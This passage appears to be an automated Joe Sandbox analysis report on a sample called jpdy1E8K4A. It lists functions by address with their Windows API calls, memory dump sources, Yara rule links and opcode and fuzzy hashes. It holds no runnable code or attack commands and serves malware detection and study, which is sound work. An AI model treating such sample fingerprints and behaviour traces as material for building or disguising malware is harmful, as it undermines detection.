                                                                                                • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                                Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                • String ID: \VH
                                                                                                • API String ID: 2507767853-234962358
                                                                                                • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                                • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                                Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                                • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: msctls_trackbar32
                                                                                                • API String ID: 3850602802-1010561917
                                                                                                • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                                • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                                Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                                                • String ID: crts
                                                                                                • API String ID: 943502515-3724388283
                                                                                                • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                                                • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                                • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                                                • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                                Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                                • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                                • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$LabelVolume
                                                                                                • String ID: \VH
                                                                                                • API String ID: 2006950084-234962358
                                                                                                • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                                • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                                Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • GetMenuItemInfoW.USER32 ref: 00449727
                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                                                • DrawMenuBar.USER32 ref: 00449761
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$InfoItem$Draw_malloc
                                                                                                • String ID: 0
                                                                                                • API String ID: 772068139-4108050209
                                                                                                • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                                                • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                                                • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                                                • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                                Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$_wcscpy
                                                                                                • String ID: 3, 3, 8, 1
                                                                                                • API String ID: 3469035223-357260408
                                                                                                • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                                                • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                                                Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                • API String ID: 2574300362-3530519716
                                                                                                • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                                                • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                                                Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                • API String ID: 2574300362-275556492
                                                                                                • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                                • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                                Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                • API String ID: 2574300362-58917771
                                                                                                • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                                • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                                Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                • API String ID: 2574300362-4033151799
                                                                                                • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                                • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                                Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                                • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$AllocClearCopyInitString
                                                                                                • String ID:
                                                                                                • API String ID: 2808897238-0
                                                                                                • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                                • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                                Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                                • __itow.LIBCMT ref: 004699CD
                                                                                                  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                                • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                                • __itow.LIBCMT ref: 00469A97
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$__itow
                                                                                                • String ID:
                                                                                                • API String ID: 3379773720-0
                                                                                                • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                                • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                                Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                                • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                • String ID:
                                                                                                • API String ID: 3880355969-0
                                                                                                • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                                • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                                Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                • String ID:
                                                                                                • API String ID: 2782032738-0
                                                                                                • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                                • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
